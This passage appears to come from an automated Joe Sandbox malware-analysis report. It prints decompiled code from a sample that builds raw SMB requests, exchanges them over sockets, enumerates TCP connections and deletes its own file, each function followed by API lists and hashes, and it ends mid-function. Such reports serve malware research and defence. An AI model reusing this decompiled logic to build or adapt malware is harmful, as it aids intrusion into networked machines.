                                                                                                          					FreeLibrary(_v20);
                                                                                                          				}
                                                                                                          				return _t41;
                                                                                                          			}

















                                                                                                          0x04a47348
                                                                                                          0x04a4734a
                                                                                                          0x04a47350
                                                                                                          0x04a47355
                                                                                                          0x04a47369
                                                                                                          0x04a4736d
                                                                                                          0x04a47414
                                                                                                          0x04a47373
                                                                                                          0x04a4737b
                                                                                                          0x04a47385
                                                                                                          0x04a4738b
                                                                                                          0x04a4738d
                                                                                                          0x04a47392
                                                                                                          0x04a473a3
                                                                                                          0x04a473a9
                                                                                                          0x04a473ab
                                                                                                          0x04a473ac
                                                                                                          0x04a473ae
                                                                                                          0x04a473b5
                                                                                                          0x04a473b7
                                                                                                          0x04a473b7
                                                                                                          0x04a473ba
                                                                                                          0x04a473be
                                                                                                          0x04a473dc
                                                                                                          0x04a473e2
                                                                                                          0x04a473ed
                                                                                                          0x04a473f2
                                                                                                          0x04a473f2
                                                                                                          0x04a473f5
                                                                                                          0x04a473fb
                                                                                                          0x04a473fe
                                                                                                          0x04a473ba
                                                                                                          0x04a473b5
                                                                                                          0x04a4740c
                                                                                                          0x04a4740c
                                                                                                          0x04a47392
                                                                                                          0x04a4741d
                                                                                                          0x04a47424
                                                                                                          0x04a47429

                                                                                                          APIs
                                                                                                          • LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 04A4734A
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04A47363
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00100000), ref: 04A4737E
                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 04A47385
                                                                                                          • GetExtendedTcpTable.IPHLPAPI(00000000,?,00000000,00000002,00000001,00000000), ref: 04A473A3
                                                                                                          • wsprintfW.USER32 ref: 04A473DC
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04A47405
                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 04A4740C
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04A47856), ref: 04A47414
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 04A4741D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeLibraryProcess$AddressAllocateErrorExtendedLastLoadProcTablewsprintf
                                                                                                          • String ID: Oqt Uqt0Xqt$%u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
                                                                                                          • API String ID: 2031097080-1837467908
                                                                                                          • Opcode ID: be6abe784e6b523309f3c65335d8fc65d12e2b9d063b5037e6a7093dd836f392
                                                                                                          • Instruction ID: 61d71fd50234c4c486e67c78739cb82342dcf42381594889c8a25b4a17e41d29
                                                                                                          • Opcode Fuzzy Hash: be6abe784e6b523309f3c65335d8fc65d12e2b9d063b5037e6a7093dd836f392
                                                                                                          • Instruction Fuzzy Hash: 3721807A940255BBDB219FA88D48BAEBBB8EFD8301F040525F941E6141D779ED01CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A49154(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                          				long _v8;
                                                                                                          				void* _v12;
                                                                                                          				void* _v16;
                                                                                                          				int _t16;
                                                                                                          				void* _t18;
                                                                                                          				int _t19;
                                                                                                          				void* _t22;
                                                                                                          				void* _t24;
                                                                                                          				char _t31;
                                                                                                          
                                                                                                          				_t16 = FreeLibrary( *0x4a57b98); // executed
                                                                                                          				 *0x4a57b8c = _t16;
                                                                                                          				if(_t16 == 0) {
                                                                                                          					return _t16;
                                                                                                          				}
                                                                                                          				_t31 = CreateFileW;
                                                                                                          				 *0x4a57b98 =  *0x4a57bb4; // executed
                                                                                                          				_t18 = CreateFileW(0x4a57bc8, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                          				_v12 = _t18;
                                                                                                          				if(_t18 != 0) {
                                                                                                          					_v8 = GetFileSize(_t18, 0);
                                                                                                          					FindCloseChangeNotification(_v12); // executed
                                                                                                          					_t22 = CreateFileW(0x4a57bc8, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                          					_v12 = _t22;
                                                                                                          					if(_t22 != 0) {
                                                                                                          						_t31 = " Oqt Uqt0Xqt";
                                                                                                          						_t24 = RtlAllocateHeap(GetProcessHeap(), 8, _v8); // executed
                                                                                                          						_v16 = _t24;
                                                                                                          						if(_t24 != 0) {
                                                                                                          							_t30 =  &_v8;
                                                                                                          							WriteFile(_v12, _t24, _v8,  &_v8, 0); // executed
                                                                                                          							HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                          						}
                                                                                                          						CloseHandle(_v12);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t19 = DeleteFileW(0x4a57bc8); // executed
                                                                                                          				 *0x4a57b84 = _t19; // executed
                                                                                                          				_t16 = E04A49016(); // executed
                                                                                                          				if(_t16 != 0) {
                                                                                                          					_t16 = E04A479D7(0x4a57bc8, _t30, _t31, _a4, _a8, _a12, _a16); // executed
                                                                                                          				}
                                                                                                          				ExitProcess(0);
                                                                                                          			}












                                                                                                          0x04a49161
                                                                                                          0x04a49169
                                                                                                          0x04a49170
                                                                                                          0x04a4923c
                                                                                                          0x04a4923c
                                                                                                          0x04a4917b
                                                                                                          0x04a49193
                                                                                                          0x04a49198
                                                                                                          0x04a4919a
                                                                                                          0x04a4919f
                                                                                                          0x04a491ac
                                                                                                          0x04a491af
                                                                                                          0x04a491c1
                                                                                                          0x04a491c3
                                                                                                          0x04a491c8
                                                                                                          0x04a491cd
                                                                                                          0x04a491d8
                                                                                                          0x04a491de
                                                                                                          0x04a491e3
                                                                                                          0x04a491e6
                                                                                                          0x04a491f1
                                                                                                          0x04a491fe
                                                                                                          0x04a491fe
                                                                                                          0x04a49207
                                                                                                          0x04a49207
                                                                                                          0x04a491c8
                                                                                                          0x04a4920e
                                                                                                          0x04a49214
                                                                                                          0x04a49219
                                                                                                          0x04a49220
                                                                                                          0x04a4922e
                                                                                                          0x04a4922e
                                                                                                          0x04a49234

                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNELBASE ref: 04A49161
                                                                                                          • CreateFileW.KERNELBASE(04A57BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04A49198
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 04A491A3
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 04A491AF
                                                                                                          • CreateFileW.KERNELBASE(04A57BC8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04A491C1
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A491D5
                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 04A491D8
                                                                                                          • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 04A491F1
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 04A491FB
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A491FE
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A49207
                                                                                                          • DeleteFileW.KERNELBASE(04A57BC8), ref: 04A4920E
                                                                                                          • ExitProcess.KERNEL32 ref: 04A49234
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Heap$Process$CloseCreateFree$AllocateChangeDeleteExitFindHandleLibraryNotificationSizeWrite
                                                                                                          • String ID: Uqt0Xqt
                                                                                                          • API String ID: 1556359713-3529349503
                                                                                                          • Opcode ID: e3baebe2262b0bbc1ab54d09d7a1029dad8ae6d022adc1c9fbe37ce31545c45c
                                                                                                          • Instruction ID: d067c0a5b5adff5ddd3abdc7b068f62aec47589fd68aa7304a2d80b6bb15610e
                                                                                                          • Opcode Fuzzy Hash: e3baebe2262b0bbc1ab54d09d7a1029dad8ae6d022adc1c9fbe37ce31545c45c
                                                                                                          • Instruction Fuzzy Hash: 8C214AB9801214BBDB116FB1AD0CD8FBF7DEFE9310F104400FA06A6510D73A9A12DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 62%
                                                                                                          			E04A41EB9(intOrPtr _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                          				char _v5;
                                                                                                          				long _v12;
                                                                                                          				void* _v16;
                                                                                                          				signed short _v20;
                                                                                                          				void* _t49;
                                                                                                          				intOrPtr* _t51;
                                                                                                          				intOrPtr* _t53;
                                                                                                          				signed short _t56;
                                                                                                          				long _t58;
                                                                                                          				void* _t66;
                                                                                                          				void* _t71;
                                                                                                          				intOrPtr* _t72;
                                                                                                          				intOrPtr* _t74;
                                                                                                          				void* _t77;
                                                                                                          				intOrPtr* _t78;
                                                                                                          				intOrPtr* _t80;
                                                                                                          				void* _t82;
                                                                                                          				void* _t88;
                                                                                                          				intOrPtr _t89;
                                                                                                          				void* _t90;
                                                                                                          				signed int _t91;
                                                                                                          				char _t93;
                                                                                                          				intOrPtr _t94;
                                                                                                          				short _t95;
                                                                                                          				intOrPtr _t96;
                                                                                                          				char _t97;
                                                                                                          				intOrPtr _t98;
                                                                                                          				intOrPtr _t99;
                                                                                                          				void* _t101;
                                                                                                          				intOrPtr _t102;
                                                                                                          				intOrPtr* _t103;
                                                                                                          				void* _t104;
                                                                                                          				void* _t106;
                                                                                                          				void* _t112;
                                                                                                          				intOrPtr* _t118;
                                                                                                          				void* _t119;
                                                                                                          				void* _t120;
                                                                                                          				intOrPtr* _t121;
                                                                                                          				void* _t122;
                                                                                                          				void* _t124;
                                                                                                          
                                                                                                          				_v5 = 0;
                                                                                                          				_t49 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v16 = _t49;
                                                                                                          				if(_t49 == 0) {
                                                                                                          					L24:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				_t51 = _a12;
                                                                                                          				_t101 = _t51 + 1;
                                                                                                          				do {
                                                                                                          					_t89 =  *_t51;
                                                                                                          					_t51 = _t51 + 1;
                                                                                                          				} while (_t89 != 0);
                                                                                                          				_t90 = _t51 - _t101;
                                                                                                          				_t53 = _a16;
                                                                                                          				_t106 = _t53 + 1;
                                                                                                          				do {
                                                                                                          					_t102 =  *_t53;
                                                                                                          					_t53 = _t53 + 1;
                                                                                                          				} while (_t102 != 0);
                                                                                                          				_t56 = _t90 + _t53 - _t106 + 0x0000000b & 0x0000ffff;
                                                                                                          				_v20 = _t56;
                                                                                                          				_t58 = (_t56 & 0x0000ffff) + 0x2f;
                                                                                                          				_v12 = _t58;
                                                                                                          				_t88 = HeapAlloc(GetProcessHeap(), 8, _t58);
                                                                                                          				if(_t88 == 0) {
                                                                                                          					L23:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                          					goto L24;
                                                                                                          				}
                                                                                                          				_t91 = 9;
                                                                                                          				_t66 = memcpy(_t88,  *_a8, _t91 << 2);
                                                                                                          				__imp__#9(_v12 + 0xfffffffc);
                                                                                                          				_t103 = _a12;
                                                                                                          				 *(_t88 + 2) = _t66;
                                                                                                          				 *((short*)(_t88 + 0x2b)) = 1;
                                                                                                          				 *((short*)(_t88 + 0x2d)) = _v20;
                                                                                                          				 *((char*)(_t88 + 8)) = 0x75;
                                                                                                          				 *((short*)(_t88 + 0x24)) = 0xff04;
                                                                                                          				asm("movsw");
                                                                                                          				_t22 = _t88 + 0x32; // 0x32
                                                                                                          				asm("movsb");
                                                                                                          				_t118 = _t103;
                                                                                                          				_t71 = _t22 - _t103;
                                                                                                          				do {
                                                                                                          					_t93 =  *_t118;
                                                                                                          					 *((char*)(_t71 + _t118)) = _t93;
                                                                                                          					_t118 = _t118 + 1;
                                                                                                          				} while (_t93 != 0);
                                                                                                          				_t72 = _t103;
                                                                                                          				_t119 = _t72 + 1;
                                                                                                          				do {
                                                                                                          					_t94 =  *_t72;
                                                                                                          					_t72 = _t72 + 1;
                                                                                                          				} while (_t94 != 0);
                                                                                                          				_t95 = 0x5c;
                                                                                                          				 *((short*)(_t72 - _t119 + _t88 + 0x32)) = _t95;
                                                                                                          				_t74 = _t103;
                                                                                                          				_t120 = _t74 + 1;
                                                                                                          				do {
                                                                                                          					_t96 =  *_t74;
                                                                                                          					_t74 = _t74 + 1;
                                                                                                          				} while (_t96 != 0);
                                                                                                          				_t121 = _a16;
                                                                                                          				_t77 = _t74 - _t120 + _t88 + 0x33 - _t121;
                                                                                                          				do {
                                                                                                          					_t97 =  *_t121;
                                                                                                          					 *((char*)(_t77 + _t121)) = _t97;
                                                                                                          					_t121 = _t121 + 1;
                                                                                                          				} while (_t97 != 0);
                                                                                                          				_t78 = _t103;
                                                                                                          				_t104 = _t78 + 1;
                                                                                                          				do {
                                                                                                          					_t98 =  *_t78;
                                                                                                          					_t78 = _t78 + 1;
                                                                                                          				} while (_t98 != 0);
                                                                                                          				_t122 = _t78 - _t104;
                                                                                                          				_t80 = _a16;
                                                                                                          				_t112 = _t80 + 1;
                                                                                                          				do {
                                                                                                          					_t99 =  *_t80;
                                                                                                          					_t80 = _t80 + 1;
                                                                                                          				} while (_t99 != 0);
                                                                                                          				_t82 = _t80 - _t112 + _t122;
                                                                                                          				asm("movsd");
                                                                                                          				asm("movsw");
                                                                                                          				__imp__#19(_a4, _t88, _v12, 0); // executed
                                                                                                          				if(_t82 > 0) {
                                                                                                          					_t124 = _v16;
                                                                                                          					__imp__#16(_a4, _t124, 0xffff, 0); // executed
                                                                                                          					if(_t82 > 0 &&  *((intOrPtr*)(_t124 + 9)) == 0) {
                                                                                                          						 *((short*)( *_a8 + 0x1c)) =  *((intOrPtr*)(_t124 + 0x1c));
                                                                                                          						_v5 = 1;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				HeapFree(GetProcessHeap(), 8, _t88);
                                                                                                          				goto L23;
                                                                                                          			}











































                                                                                                          0x04a41ece
                                                                                                          0x04a41edb
                                                                                                          0x04a41edd
                                                                                                          0x04a41ee2
                                                                                                          0x04a4204b
                                                                                                          0x04a42051
                                                                                                          0x04a42051
                                                                                                          0x04a41ee8
                                                                                                          0x04a41eeb
                                                                                                          0x04a41eee
                                                                                                          0x04a41eee
                                                                                                          0x04a41ef0
                                                                                                          0x04a41ef1
                                                                                                          0x04a41ef7
                                                                                                          0x04a41ef9
                                                                                                          0x04a41efd
                                                                                                          0x04a41f00
                                                                                                          0x04a41f00
                                                                                                          0x04a41f02
                                                                                                          0x04a41f03
                                                                                                          0x04a41f0d
                                                                                                          0x04a41f10
                                                                                                          0x04a41f16
                                                                                                          0x04a41f1c
                                                                                                          0x04a41f24
                                                                                                          0x04a41f28
                                                                                                          0x04a42038
                                                                                                          0x04a42044
                                                                                                          0x00000000
                                                                                                          0x04a4204a
                                                                                                          0x04a41f38
                                                                                                          0x04a41f3f
                                                                                                          0x04a41f41
                                                                                                          0x04a41f47
                                                                                                          0x04a41f4a
                                                                                                          0x04a41f51
                                                                                                          0x04a41f59
                                                                                                          0x04a41f5d
                                                                                                          0x04a41f61
                                                                                                          0x04a41f6f
                                                                                                          0x04a41f71
                                                                                                          0x04a41f74
                                                                                                          0x04a41f75
                                                                                                          0x04a41f77
                                                                                                          0x04a41f79
                                                                                                          0x04a41f79
                                                                                                          0x04a41f7b
                                                                                                          0x04a41f7e
                                                                                                          0x04a41f7f
                                                                                                          0x04a41f83
                                                                                                          0x04a41f85
                                                                                                          0x04a41f88
                                                                                                          0x04a41f88
                                                                                                          0x04a41f8a
                                                                                                          0x04a41f8b
                                                                                                          0x04a41f93
                                                                                                          0x04a41f94
                                                                                                          0x04a41f99
                                                                                                          0x04a41f9b
                                                                                                          0x04a41f9e
                                                                                                          0x04a41f9e
                                                                                                          0x04a41fa0
                                                                                                          0x04a41fa1
                                                                                                          0x04a41fa7
                                                                                                          0x04a41fae
                                                                                                          0x04a41fb0
                                                                                                          0x04a41fb0
                                                                                                          0x04a41fb2
                                                                                                          0x04a41fb5
                                                                                                          0x04a41fb6
                                                                                                          0x04a41fba
                                                                                                          0x04a41fbc
                                                                                                          0x04a41fbf
                                                                                                          0x04a41fbf
                                                                                                          0x04a41fc1
                                                                                                          0x04a41fc2
                                                                                                          0x04a41fc8
                                                                                                          0x04a41fca
                                                                                                          0x04a41fcd
                                                                                                          0x04a41fd0
                                                                                                          0x04a41fd0
                                                                                                          0x04a41fd2
                                                                                                          0x04a41fd3
                                                                                                          0x04a41fd9
                                                                                                          0x04a41fe4
                                                                                                          0x04a41fe5
                                                                                                          0x04a41ff1
                                                                                                          0x04a41ff9
                                                                                                          0x04a41ffb
                                                                                                          0x04a42008
                                                                                                          0x04a42010
                                                                                                          0x04a42020
                                                                                                          0x04a42024
                                                                                                          0x04a42024
                                                                                                          0x04a42010
                                                                                                          0x04a42032
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,04A4943A), ref: 04A41ED2
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A41EDB
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04A4943A), ref: 04A41F1F
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A41F22
                                                                                                          • htons.WS2_32(?), ref: 04A41F41
                                                                                                          • send.WS2_32(?,00000000,?,00000000), ref: 04A41FF1
                                                                                                          • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04A42008
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04A4943A), ref: 04A4202B
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A42032
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04A4943A), ref: 04A4203D
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A42044
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                          • String ID: Oqt Uqt0Xqt$?????
                                                                                                          • API String ID: 1780562090-2068679943
                                                                                                          • Opcode ID: 2e63ea1498f0b9f2dd136b61ad72e7aad642492dee775cfa9dd536ac82adb71f
                                                                                                          • Instruction ID: 8f8dce2201e2dd18284326a378b4a0ca5165e7b86bfc8d55d0f2582f8f565ddb
                                                                                                          • Opcode Fuzzy Hash: 2e63ea1498f0b9f2dd136b61ad72e7aad642492dee775cfa9dd536ac82adb71f
                                                                                                          • Instruction Fuzzy Hash: F5511636A002469FDB118F68D858AAE7FF5EFC9340B058195FC84DB355DB35E90AC760
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 39%
                                                                                                          			E04A41DD1(void* __ecx, intOrPtr _a4, void** _a8) {
                                                                                                          				char _v5;
                                                                                                          				void* _v12;
                                                                                                          				void* _t20;
                                                                                                          				void* _t27;
                                                                                                          				void* _t35;
                                                                                                          				signed int _t38;
                                                                                                          				void* _t47;
                                                                                                          
                                                                                                          				_v5 = 0;
                                                                                                          				_t20 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v12 = _t20;
                                                                                                          				if(_t20 != 0) {
                                                                                                          					_t35 = HeapAlloc(GetProcessHeap(), 8, 0x2b);
                                                                                                          					if(_t35 != 0) {
                                                                                                          						_t38 = 9;
                                                                                                          						_t27 = memcpy(_t35,  *_a8, _t38 << 2);
                                                                                                          						__imp__#9(0x27);
                                                                                                          						 *(_t35 + 2) = _t27;
                                                                                                          						 *((char*)(_t35 + 8)) = 0x74;
                                                                                                          						 *((short*)(_t35 + 0x24)) = 0xff02;
                                                                                                          						 *((char*)(_t35 + 0x26)) = 0x42;
                                                                                                          						 *((short*)(_t35 + 0x27)) = 0x4559;
                                                                                                          						__imp__#19(_a4, _t35, 0x2b, 0); // executed
                                                                                                          						if(0x4559 > 0) {
                                                                                                          							_t47 = _v12;
                                                                                                          							__imp__#16(_a4, _t47, 0xffff, 0); // executed
                                                                                                          							if(0x4559 > 0 &&  *((intOrPtr*)(_t47 + 9)) == 0) {
                                                                                                          								 *((short*)( *_a8 + 0x20)) = 0;
                                                                                                          								memset(_t47, 0, 0xffff);
                                                                                                          								_v5 = 1;
                                                                                                          							}
                                                                                                          						}
                                                                                                          						HeapFree(GetProcessHeap(), 8, _t35);
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                          				}
                                                                                                          				return _v5;
                                                                                                          			}










                                                                                                          0x04a41de5
                                                                                                          0x04a41df2
                                                                                                          0x04a41df4
                                                                                                          0x04a41df9
                                                                                                          0x04a41e09
                                                                                                          0x04a41e0d
                                                                                                          0x04a41e1a
                                                                                                          0x04a41e1f
                                                                                                          0x04a41e21
                                                                                                          0x04a41e2f
                                                                                                          0x04a41e38
                                                                                                          0x04a41e3c
                                                                                                          0x04a41e42
                                                                                                          0x04a41e46
                                                                                                          0x04a41e4a
                                                                                                          0x04a41e52
                                                                                                          0x04a41e54
                                                                                                          0x04a41e63
                                                                                                          0x04a41e6b
                                                                                                          0x04a41e7d
                                                                                                          0x04a41e81
                                                                                                          0x04a41e89
                                                                                                          0x04a41e89
                                                                                                          0x04a41e6b
                                                                                                          0x04a41e97
                                                                                                          0x04a41e97
                                                                                                          0x04a41ea9
                                                                                                          0x04a41eaf
                                                                                                          0x04a41eb6

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04A454D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04A41DE9
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A454D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04A41DF2
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,04A454D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04A41E04
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A454D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04A41E07
                                                                                                          • htons.WS2_32(00000027), ref: 04A41E21
                                                                                                          • send.WS2_32(?,00000000,0000002B,00000000), ref: 04A41E4A
                                                                                                          • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04A41E63
                                                                                                          • memset.MSVCRT ref: 04A41E81
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04A454D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04A41E90
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A454D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04A41E97
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04A454D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04A41EA2
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A454D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04A41EA9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFree$htonsmemsetrecvsend
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 255267840-636472023
                                                                                                          • Opcode ID: fc41be116c87d40acab20a480ad09b3b720eb7e53554bd189e94d3a6ddd5537c
                                                                                                          • Instruction ID: 19decb9476a309b01cd36ef5ebc92c5a3d58f8456456da42aaccf1faa3861e8b
                                                                                                          • Opcode Fuzzy Hash: fc41be116c87d40acab20a480ad09b3b720eb7e53554bd189e94d3a6ddd5537c
                                                                                                          • Instruction Fuzzy Hash: 24219E75600205BBEB109FA48C49F6E7B68FFD9700F044459F9089F280DBB9E905C764
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 68%
                                                                                                          			E04A42054(intOrPtr _a4, void* _a8, short* _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                                          				char _v5;
                                                                                                          				long _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _t38;
                                                                                                          				intOrPtr* _t40;
                                                                                                          				long _t42;
                                                                                                          				void* _t49;
                                                                                                          				intOrPtr* _t50;
                                                                                                          				short _t51;
                                                                                                          				void* _t54;
                                                                                                          				void* _t59;
                                                                                                          				void* _t61;
                                                                                                          				signed int _t62;
                                                                                                          				intOrPtr _t64;
                                                                                                          				char _t66;
                                                                                                          				intOrPtr _t68;
                                                                                                          				void* _t76;
                                                                                                          				intOrPtr* _t77;
                                                                                                          				void* _t78;
                                                                                                          
                                                                                                          				_v5 = 0;
                                                                                                          				_t38 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v16 = _t38;
                                                                                                          				if(_t38 == 0) {
                                                                                                          					L14:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				_t40 = _a16;
                                                                                                          				_t61 = _t40 + 1;
                                                                                                          				do {
                                                                                                          					_t68 =  *_t40;
                                                                                                          					_t40 = _t40 + 1;
                                                                                                          				} while (_t68 != 0);
                                                                                                          				_t42 = _t40 - _t61 + 0x58;
                                                                                                          				_v12 = _t42;
                                                                                                          				_t59 = HeapAlloc(GetProcessHeap(), 8, _t42);
                                                                                                          				if(_t59 == 0) {
                                                                                                          					L13:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                          					goto L14;
                                                                                                          				}
                                                                                                          				_t62 = 9;
                                                                                                          				_t49 = memcpy(_t59, _a8, _t62 << 2);
                                                                                                          				__imp__#9(_v12 + 0xfffffffc);
                                                                                                          				 *(_t59 + 2) = _t49;
                                                                                                          				_t50 = _a16;
                                                                                                          				 *((char*)(_t59 + 8)) = 0xa2;
                                                                                                          				 *((short*)(_t59 + 0x24)) = 0xff18;
                                                                                                          				_t76 = _t50 + 1;
                                                                                                          				do {
                                                                                                          					_t64 =  *_t50;
                                                                                                          					_t50 = _t50 + 1;
                                                                                                          				} while (_t64 != 0);
                                                                                                          				_t51 = _t50 - _t76;
                                                                                                          				_t77 = _a16;
                                                                                                          				 *((short*)(_t59 + 0x2a)) = _t51;
                                                                                                          				 *((short*)(_t59 + 0x55)) = _t51 + 1;
                                                                                                          				_t18 = _t59 + 0x57; // 0x57
                                                                                                          				 *((intOrPtr*)(_t59 + 0x2c)) = 0x16;
                                                                                                          				 *((intOrPtr*)(_t59 + 0x34)) = 0x2019f;
                                                                                                          				 *((intOrPtr*)(_t59 + 0x44)) = 3;
                                                                                                          				 *((intOrPtr*)(_t59 + 0x48)) = _a20;
                                                                                                          				 *((intOrPtr*)(_t59 + 0x4c)) = 0x40;
